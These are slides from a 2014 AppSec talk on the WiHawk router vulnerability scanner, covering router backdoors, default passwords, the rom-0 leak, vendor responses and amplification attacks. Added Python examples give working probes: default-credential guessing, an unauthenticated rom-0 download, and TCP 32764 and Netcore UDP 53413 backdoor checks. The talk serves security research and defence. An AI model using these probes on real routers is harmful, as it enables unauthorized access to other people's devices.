OWASP Appsec USA 2014 Talk "Pwning the Pawns with Wihawk" Santhosh Kumar
AppSec USA 2014
Denver, Colorado
Pwning the Pawns with WiHawk
An Automated Solution to the Pesky Router Problem
Santhosh Kumar
Anamika Singh
Free infosec supporter | nearsecurity
Introduction
Santhosh Kumar, India
An independent security researcher working on
various domains.
Acknowledged by IBM, Intel, Microsoft, Cisco,
Yahoo & more.
Contributor to the WiHawk Router Vulnerability
Scanner | still write "hello world" | Eng student
Current Work on Embedded Devices.
I Run a DEFCON Group @chennai (DC 602028)
@security_b0x
in.linkedin.com/pub/santhosh-kumar/6a/974/8b9
Introduction
Anamika Singh
Product Security Analyst @ IronWASP Information
Security Service Pvt. Ltd.
Author Of the WiHawk Router Vulnerability
Scanner.
Speaker @ HITB/Haxpo Amsterdam, Selenium
International Conf 14, Ground Zero Sri Lanka,
NULLCON Goa & DC Group @kerala
@_Anamikas_
in.linkedin.com/pub/anamika-singh/80/4a5/5b5/
Red Team Vs Blue Team
How many of you include routers in a real penetration
test?
Regular firmware upgrade? Alternative firmware?
Does your internet work?
Remote management enabled?
Support from these companies on security issues is
pathetic.
End of life is another issue!! I mean, who buys a router every
1.5 years :P seriously?
Agenda
Introduction
Sample Router Analysis
Open Source Tools.
Automation Using WiHawk.
Alternative Options.
Consequences: Amplification Attacks
Vendor Response
• End of Life for the Product?
• Couldn’t Identify the issue.
• North America got the 1.0.44 firmware,
but it was taken down soon after.
• Change Router?
• Is the Internet working?
• Netgear WNR1000 is also affected
Outcome of Analysis
The following vendors' firmware is affected: Billion, TP-Link, Sitecom,
Michelangelo, Edimax, Trust, Airline, Topcom (RomPager 4.7
exploit).
No patch for certain devices (EOL)
Some didn't even bother to respond
Around 25 million routers still vulnerable
Did the Internet work?
Services are Dangerous too
• ASUS suffered a series of FTP-based service flaws.
• The router shares attached disk storage through that service.
• After the update the service was patched only for active FTP
mode.
• Passive mode continues to work to this day.
• Able to access the entire mounted hard drive.
Vendor Response
• But we just patched that.
• That's the feature.
• The following models are affected:
ASUS RT-N10U
ASUS RT-N56U
ASUS DSL-N55U
ASUS RT-AC66U
ASUS RT-N15U
ASUS RT-N53
• Is the Internet working?
WiHawk - Router Vulnerability Scanner
Make sure your life is easy.
https://github.com/santhoshkumar22/Wihawk-SOHO
https://ironwasp.org/download.html
Functionality:
Single IP
Example: 192.168.1.1
Range of IP
Example: 192.168.1.1-25 or 192.168.1.1/25
Shodan API
Geo Location
City
Country
WiHawk
WiHawk Scans Router for
Default Configuration
Bypass Authentication
TCP 32764 Backdoor
Edit by Joel (Joel’s Backdoor)
CSRF (VIP)
XSS (VIP)
Buffer and Stack Overflow (Beta)
ROM-0
Default Passwords
Maintains a file of unique usernames and passwords.
Covers a variety of models from different router vendors like:
Linksys
Netgear
Cisco
CNET
Beetel
WiHawk – Default Password Check
WiHawk sends a request to the target IP with each default username/password pair:
Response 401: not accepted, try the next pair.
Response 200: BINGO!
Username : User
Password : pass
WiHawk – ByPass Authentication
WiHawk scans routers for the authentication bypass
vulnerability.
Appends the bypass string to the IP (URL).
If the vulnerability is found, prints the IP with the bypass string.
WiHawk – Backdoor Detection
A backdoor gives free access to many hosts on the Internet.
It allows various remote operations, such as:
Remote access to a root shell on the router
File copy
WiHawk checks for backdoors like:
TCP 32764 backdoor
Edit By Joel backdoor
TCP 32764 Backdoor
Create a socket and connect to port 32764.
Port 32764 open? NO: port 32764 is not vulnerable.
YES: write to the socket and read the response.
Response data found, starting with "MMcS" or "ScMM"? NO: port 32764 is not vulnerable.
YES: port 32764 is vulnerable.
WiHawk – Rom-0 attack
rom-0 is a router configuration file.
Located at http://IP/rom-0, and the path isn't password protected.
The configuration file contains the "admin" password (the file is LZS-compressed, so it has to be decompressed before the password can be read).
WiHawk:
Checks whether the router is vulnerable to the rom-0 attack
Downloads the rom-0 file
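The two HTTP checks described above (the 401/200 default-password loop from the "Default Password Check" slide, and the unauthenticated rom-0 download) as an added Python example. This is not WiHawk's or IronWASP's code: the candidate credential list and the `FakeRouter` web UI are constructed stand-ins so the checks run offline against loopback; a real run would point `base_url` at the router instead of calling `start_fake_router()`.

```python
"""Added example (not WiHawk's code): default-credential guessing and the
unauthenticated /rom-0 fetch, with a constructed loopback router to run
against."""
import base64
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.error import HTTPError
from urllib.request import Request, urlopen

# Constructed candidate list; WiHawk keeps a much larger file of vendor defaults.
DEFAULT_CREDENTIALS = [
    ("admin", "admin"),
    ("admin", "password"),
    ("User", "pass"),
]


class FakeRouter(BaseHTTPRequestHandler):
    """Constructed stand-in for a SOHO router web UI: basic-auth admin page,
    plus a /rom-0 that is handed out with no authentication at all."""
    VALID = base64.b64encode(b"User:pass").decode()
    ROM0 = b"\x00" * 16 + b"constructed rom-0 blob"

    def do_GET(self):
        if self.path == "/rom-0":
            # The flaw: the config dump is served without any credentials.
            self.send_response(200)
            self.send_header("Content-Type", "application/octet-stream")
            self.send_header("Content-Length", str(len(self.ROM0)))
            self.end_headers()
            self.wfile.write(self.ROM0)
            return
        if self.headers.get("Authorization", "") == "Basic " + self.VALID:
            body = b"<html>admin page</html>"
            self.send_response(200)
        else:
            body = b"Unauthorized"
            self.send_response(401)
            self.send_header("WWW-Authenticate", 'Basic realm="router"')
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, *args):  # keep the example quiet
        pass


def start_fake_router():
    """Start the stand-in on a free loopback port; returns its base URL."""
    server = HTTPServer(("127.0.0.1", 0), FakeRouter)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return "http://127.0.0.1:%d" % server.server_address[1]


def check_default_credentials(base_url, candidates=DEFAULT_CREDENTIALS, timeout=5):
    """The slide's loop: 401 means try the next pair, 200 means BINGO.
    Returns the first working (username, password) pair, or None."""
    for user, password in candidates:
        token = base64.b64encode(("%s:%s" % (user, password)).encode()).decode()
        req = Request(base_url + "/", headers={"Authorization": "Basic " + token})
        try:
            with urlopen(req, timeout=timeout) as resp:
                if resp.status == 200:
                    return (user, password)
        except HTTPError as err:
            if err.code != 401:
                # Anything other than 401 is not a credential failure: stop guessing.
                return None
    return None


def fetch_rom0(base_url, timeout=5):
    """Fetch /rom-0 with no credentials. Returns the bytes if the router hands
    the file out (vulnerable), None otherwise."""
    try:
        with urlopen(base_url + "/rom-0", timeout=timeout) as resp:
            data = resp.read()
            # A captive portal or login page can answer 200 with HTML; rom-0 is
            # a binary blob, so refuse to report markup as a leak.
            if resp.status == 200 and data and not data.lstrip().startswith(b"<"):
                return data
    except (HTTPError, OSError):
        pass
    return None


if __name__ == "__main__":
    target = start_fake_router()
    print("default creds:", check_default_credentials(target))
    rom0 = fetch_rom0(target)
    print("rom-0 leaked:", rom0 is not None, "bytes:", len(rom0 or b""))
```

The credential loop stops on any status other than 401 so a device behind a redirecting portal is not hammered with the whole list, and the rom-0 check treats only a non-HTML 200 as a leak; decompressing the LZS blob to recover the admin password is a separate step not shown here.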
Netis/Netcore Backdoor
• This one was detected back in August 2014.
• It has a mysterious service running on UDP port 53413.
• We check whether the service is running, then try to connect to it
over UDP.
• The probe appears to be "A"*8 + "netcore\x00".
• Observe the connection using netcat.
• Another 2 million devices are affected by this.
• Able to reach Netis Systems after a long call.
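Probes for both backdoors described above (the TCP 32764 flow chart and the Netis/Netcore UDP 53413 service) as one added Python example; this is not WiHawk's code. The two loopback listeners are constructed stand-ins that only mimic the first bytes of a real reply so the probes can be exercised offline. The 12-byte header sent to 32764 (the magic word plus two zeroed fields) is an assumption about what makes the service answer; the `netcore` probe string is taken from the slide.

```python
"""Added example (not WiHawk's code): probes for the TCP/32764 and
Netis/Netcore UDP/53413 backdoors, plus constructed loopback stand-ins
so the probes can be run offline."""
import socket
import socketserver
import struct
import threading

# TCP/32764: a reply whose first four bytes are "MMcS" or "ScMM" (the same
# magic word in either byte order) marks the backdoor, as in the flow chart.
BACKDOOR_MAGIC = (b"MMcS", b"ScMM")
# What we write: a 12-byte header carrying the magic with zeroed type/length.
# Assumption: the service answers any header with its own magic-prefixed header.
PROBE_32764 = struct.pack("<III", 0x53634D4D, 0, 0)

# UDP/53413: the probe from the slide, 8 filler bytes followed by the
# null-terminated hard-coded password "netcore".
NETCORE_PROBE = b"A" * 8 + b"netcore\x00"


def check_tcp_32764(host, port=32764, timeout=3):
    """Flow from the slide: connect, write, read, look for the magic.
    Returns True (vulnerable), False (open but no magic) or None (closed/no data)."""
    try:
        with socket.create_connection((host, port), timeout=timeout) as sock:
            sock.sendall(PROBE_32764)
            data = sock.recv(64)
    except OSError:  # refused, timed out or reset: port is not vulnerable
        return None
    if not data:
        return None
    return any(data.startswith(magic) for magic in BACKDOOR_MAGIC)


def check_udp_53413(host, port=53413, probe=NETCORE_PROBE, timeout=3):
    """Send the netcore probe; return the first reply (bytes) or None if the
    service stays silent. UDP gives no 'closed' signal, so silence is all a
    patched or absent service ever shows you."""
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
        sock.settimeout(timeout)
        sock.sendto(probe, (host, port))
        try:
            data, _ = sock.recvfrom(1024)
        except socket.timeout:
            return None
    return data or None


# ---- constructed stand-ins, only so the probes above can run offline ----

class FakeScMM(socketserver.BaseRequestHandler):
    """Answers any request with a header that starts with the backdoor magic."""
    def handle(self):
        self.request.recv(64)
        self.request.sendall(struct.pack("<III", 0x53634D4D, 0, 0))


class FakeNetcore(socketserver.BaseRequestHandler):
    """Answers only when the exact netcore probe arrives; otherwise silent."""
    def handle(self):
        data, sock = self.request
        if data == NETCORE_PROBE:
            sock.sendto(b"constructed: login ok\n", self.client_address)


def start_fake_backdoors():
    """Start both stand-ins on free loopback ports; returns (tcp_port, udp_port)."""
    tcp = socketserver.TCPServer(("127.0.0.1", 0), FakeScMM)
    udp = socketserver.UDPServer(("127.0.0.1", 0), FakeNetcore)
    for srv in (tcp, udp):
        threading.Thread(target=srv.serve_forever, daemon=True).start()
    return tcp.server_address[1], udp.server_address[1]


if __name__ == "__main__":
    tcp_port, udp_port = start_fake_backdoors()
    print("TCP 32764 vulnerable:", check_tcp_32764("127.0.0.1", tcp_port))
    print("UDP 53413 reply:", check_udp_53413("127.0.0.1", udp_port))
```

Against a real target replace the loopback ports with the defaults; the TCP check distinguishes "closed" from "open but not the backdoor", while the UDP check can only report a reply or a timeout, which is why the slide suggests watching the exchange with netcat.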
WiHawk
• WiHawk is built as an integral part of IronWASP.
• IronWASP is an Open Source Web Security Scanner.
Ironwasp
• IronWASP is an open source Web
Security Scanner.
• It's one of the best scanners.
• Checks for more than 25
vulnerabilities.
• It stands better than commercial
scanners on some parameters.
• Some of the other existing modules
are:
– Drupsnipe: Black box Drupal
vulnerability scanner.
– Skanda : Port scan on Server vulnerable
to SSRF.
Bigger Threat
• Routers not only cause data loss but also contribute to
bigger attacks.
• The threat comes as amplification attacks from these
unpatched routers.
• Almost 25 million are still open to amplification on various
protocols as we speak.
• DNS, NTP, SMTP etc.
• The observation was made over 2 months.
Observe
• We found that most of the traffic from our honeydns server
was directed towards a "gaming network" owned by a
specific corp.
• Amplification varied from 50 Gbps to 110 Gbps.
• Looks like someone wants to establish their "flag" on those
networks. | USIS of URAG and ZIRIA
• 80% of the traffic we got was from routers.
Solution:
• Firmware updates. Vendors should do extensive testing.
• If no firmware is available, use open after-market firmware like
Tomato, DD-WRT, OpenWrt.
• Defend against "purpose domains".
• ISPs should implement BCP 38 (network ingress filtering), RFC
2827.
• Network admins: force the use of TCP instead of UDP.